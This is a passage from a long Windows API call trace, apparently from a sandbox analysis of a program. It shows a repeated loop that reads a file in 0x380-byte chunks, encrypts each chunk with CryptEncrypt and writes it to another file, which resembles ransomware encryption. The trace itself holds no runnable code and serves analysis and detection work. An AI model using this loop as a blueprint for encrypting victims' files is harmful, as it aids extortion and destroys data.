lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.434] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.434] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.434] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.435] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.435] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.435] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.435] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.435] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.436] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.436] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.436] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.436] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.436] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.436] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.437] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.437] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.437] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.437] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.437] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.437] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.441] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.441] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.441] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.442] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.442] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.442] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.442] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.442] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.442] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.442] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.442] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.442] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.443] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.443] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.443] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.443] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.443] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.443] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.443] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.444] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.444] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.444] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.444] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.444] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.444] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.444] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.445] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.445] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.445] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.445] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, 